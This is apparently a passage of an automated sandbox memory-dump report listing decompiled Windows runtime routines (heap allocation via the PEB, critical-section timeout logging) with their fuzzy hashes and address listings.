                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ba52e1a8dd9e7c48390e1567c0c6905e7bc778a7d4ed99b8e4875aa8091c4b0
                                                              • Instruction ID: b85e7ae5de526631cd4f9aaf3a060b976d545a78cc9febca8a571b1dda17fb94
                                                              • Opcode Fuzzy Hash: 8ba52e1a8dd9e7c48390e1567c0c6905e7bc778a7d4ed99b8e4875aa8091c4b0
                                                              • Instruction Fuzzy Hash: 8BD05EA13610485AF72D7720A994B363213EBC9B1CF304CCDF1875A9E0DEA4FCE49289
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BC16E0(void* __edx, void* __eflags) {
                                                              				void* __ecx;
                                                              				void* _t3;
                                                              
                                                              				_t3 = E04BC1710(0x4c867e0);
                                                              				if(_t3 == 0) {
                                                              					_t6 =  *[fs:0x30];
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                              						goto L1;
                                                              					} else {
                                                              						return L04BB4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                              					}
                                                              				} else {
                                                              					L1:
                                                              					return _t3;
                                                              				}
                                                              			}





                                                              0x04bc16e8
                                                              0x04bc16ef
                                                              0x04bc16f3
                                                              0x04bc16fe
                                                              0x00000000
                                                              0x04bc1700
                                                              0x04bc170d
                                                              0x04bc170d
                                                              0x04bc16f2
                                                              0x04bc16f2
                                                              0x04bc16f2
                                                              0x04bc16f2

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a30ebabc4e7b5d0a2a586e803f7df8a958405572e3d9477ca5d1170ffd7336a
                                                              • Instruction ID: 607bfc73515831ec5b35a39fc38402f9c69303d0a488cf9539443bc63a6c7627
                                                              • Opcode Fuzzy Hash: 7a30ebabc4e7b5d0a2a586e803f7df8a958405572e3d9477ca5d1170ffd7336a
                                                              • Instruction Fuzzy Hash: 90D0C77124154056FA2D5F199894B153256EB80B99F3800EDF10BA94D2CFB5FD92E898
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BC35A1(void* __eax, void* __ebx, void* __ecx) {
                                                              				void* _t6;
                                                              				void* _t10;
                                                              				void* _t11;
                                                              
                                                              				_t10 = __ecx;
                                                              				_t6 = __eax;
                                                              				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                              					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                              				}
                                                              				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                              					return E04BAEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                              				}
                                                              				return _t6;
                                                              			}






                                                              0x04bc35a1
                                                              0x04bc35a1
                                                              0x04bc35a5
                                                              0x04bc35ab
                                                              0x04bc35ab
                                                              0x04bc35b5
                                                              0x00000000
                                                              0x04bc35c1
                                                              0x04bc35b7

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                              • Instruction ID: 96495ea97f6d28d311eac61e3d23a79d292c1032dc0a0dae51a6f84aa62e3194
                                                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                              • Instruction Fuzzy Hash: C8D0C9315561849EEB51AB50C2A876877F2FB0031CFD8B0ED984616952C33EAA5ED641
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BAAAB0() {
                                                              				intOrPtr* _t4;
                                                              
                                                              				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                              				if(_t4 != 0) {
                                                              					if( *_t4 == 0) {
                                                              						goto L1;
                                                              					} else {
                                                              						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                              					}
                                                              				} else {
                                                              					L1:
                                                              					return 0x7ffe0030;
                                                              				}
                                                              			}




                                                              0x04baaab6
                                                              0x04baaabb
                                                              0x04bfa442
                                                              0x00000000
                                                              0x04bfa448
                                                              0x04bfa454
                                                              0x04bfa454
                                                              0x04baaac1
                                                              0x04baaac1
                                                              0x04baaac6
                                                              0x04baaac6

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                              • Instruction ID: 9640a4c9161339b563d7847cc1ce48246fa42db42a81a24e42131f03aab6e555
                                                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                              • Instruction Fuzzy Hash: 05D0E935352A80CFD71ADF5DC954B1573A4FB48B44FC504D0E505CBB61E62CED55CA10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04C1A537(intOrPtr _a4, intOrPtr _a8) {
                                                              
                                                              				return L04BB8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                              			}



                                                              0x04c1a553

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                              • Instruction ID: bba2a4f2750d0de2fc454b7d28f707d12d9f73c74311e5dca79f2f2827f936d6
                                                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                              • Instruction Fuzzy Hash: CBC01232080248BBCB127E81CC01F567B2AEB94B60F008410BA480A5608672E970EA84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04B9DB40() {
                                                              				signed int* _t3;
                                                              				void* _t5;
                                                              
                                                              				_t3 = L04BB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                              				if(_t3 == 0) {
                                                              					return 0;
                                                              				} else {
                                                              					 *_t3 =  *_t3 | 0x00000400;
                                                              					return _t3;
                                                              				}
                                                              			}





                                                              0x04b9db4d
                                                              0x04b9db54
                                                              0x04b9db5f
                                                              0x04b9db56
                                                              0x04b9db56
                                                              0x04b9db5c
                                                              0x04b9db5c

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                              • Instruction ID: 748ae0d2498c971c1158ae1859b0a05922583939d04c44c82988160c1338c057
                                                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                              • Instruction Fuzzy Hash: 3EC08C30290A00AAEB221F20CD01B5036A4FB00B05F4400E06301DA0F0DBB8EC01EA00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04B9AD30(intOrPtr _a4) {
                                                              
                                                              				return L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                              			}



                                                              0x04b9ad49

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                              • Instruction ID: f70cea4d75df3b70e0ce6febc4aedbabe294fd1005efedf5f1c54eac26bcfd0d
                                                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                              • Instruction Fuzzy Hash: 24C08C32080288BBC7126A46CD00F117B29E790B60F000020BA040A6618972E860D5C8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BA76E2(void* __ecx) {
                                                              				void* _t5;
                                                              
                                                              				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                              					return L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                              				}
                                                              				return _t5;
                                                              			}




                                                              0x04ba76e4
                                                              0x00000000
                                                              0x04ba76f8
                                                              0x04ba76fd

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                              • Instruction ID: 8327884e713576420eed6c6fb075d421bb05557375841200ad76a5cb0101e5ac
                                                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                              • Instruction Fuzzy Hash: F0C08C701491C05AEB2A6B0CCE20B303650EB08708F4C01DCAA410D4A1CBA8F826C288
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BC36CC(void* __ecx) {
                                                              
                                                              				if(__ecx > 0x7fffffff) {
                                                              					return 0;
                                                              				} else {
                                                              					return L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                              				}
                                                              			}



                                                              0x04bc36d2
                                                              0x04bc36e8
                                                              0x04bc36d4
                                                              0x04bc36e5
                                                              0x04bc36e5

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                              • Instruction ID: b9310083b6937fdd165c47a414262510334dd824c24ea73f31fb6d647735b6b2
                                                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                              • Instruction Fuzzy Hash: 8CC09B75155840FBE7155F30CD51F657294F740A65FA407E87221495F1D579BC00D544
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BB3A1C(intOrPtr _a4) {
                                                              				void* _t5;
                                                              
                                                              				return L04BB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                              			}




                                                              0x04bb3a35

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                              • Instruction ID: 682ee58380c16d92387edaaeafc9bbbb625050417566588d6f4c39babf360470
                                                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                              • Instruction Fuzzy Hash: A4C08C32080648BBC7126E41DC00F117B29E790B60F000060B6040A5618572EC60D988
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BB7D50() {
                                                              				intOrPtr* _t3;
                                                              
                                                              				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                              				if(_t3 != 0) {
                                                              					return  *_t3;
                                                              				} else {
                                                              					return _t3;
                                                              				}
                                                              			}




                                                              0x04bb7d56
                                                              0x04bb7d5b
                                                              0x04bb7d60
                                                              0x04bb7d5d
                                                              0x04bb7d5d
                                                              0x04bb7d5d

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                              • Instruction ID: be4c5aa19dab2be5e2c0128d1b41d66dc342ae0a6f40ffce80ef4a7341cfb48a
                                                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                              • Instruction Fuzzy Hash: 78B092343019408FCF16DF18C080B6533E4FB84A80B8400D4E400CBA20D629E8009900
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 53%
                                                              			E04C2FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                              				void* _t7;
                                                              				intOrPtr _t9;
                                                              				intOrPtr _t10;
                                                              				intOrPtr* _t12;
                                                              				intOrPtr* _t13;
                                                              				intOrPtr _t14;
                                                              				intOrPtr* _t15;
                                                              
                                                              				_t13 = __edx;
                                                              				_push(_a4);
                                                              				_t14 =  *[fs:0x18];
                                                              				_t15 = _t12;
                                                              				_t7 = E04BDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                              				_push(_t13);
                                                              				E04C25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                              				_t9 =  *_t15;
                                                              				if(_t9 == 0xffffffff) {
                                                              					_t10 = 0;
                                                              				} else {
                                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                              				}
                                                              				_push(_t10);
                                                              				_push(_t15);
                                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                              				return E04C25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                              			}










                                                              0x04c2fdda
                                                              0x04c2fde2
                                                              0x04c2fde5
                                                              0x04c2fdec
                                                              0x04c2fdfa
                                                              0x04c2fdff
                                                              0x04c2fe0a
                                                              0x04c2fe0f
                                                              0x04c2fe17
                                                              0x04c2fe1e
                                                              0x04c2fe19
                                                              0x04c2fe19
                                                              0x04c2fe19
                                                              0x04c2fe20
                                                              0x04c2fe21
                                                              0x04c2fe22
                                                              0x04c2fe25
                                                              0x04c2fe40

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C2FDFA
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C2FE2B
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C2FE01
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                              • API String ID: 885266447-3903918235
                                                              • Opcode ID: 87767164ef511f9fb987b05dfaca056f56eba3f3c4bd6b43d82aa3a8c4866816
                                                              • Instruction ID: 50fa89f3c69d00c2c6950450dce0eaed28d2620b3bcb1fefd2370c6a26b9a627
                                                              • Opcode Fuzzy Hash: 87767164ef511f9fb987b05dfaca056f56eba3f3c4bd6b43d82aa3a8c4866816
                                                              • Instruction Fuzzy Hash: FEF0F672240211BFE6252A45DD02F33BF6BEB44B30F140358F628561E1EAA2FC20E6F4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%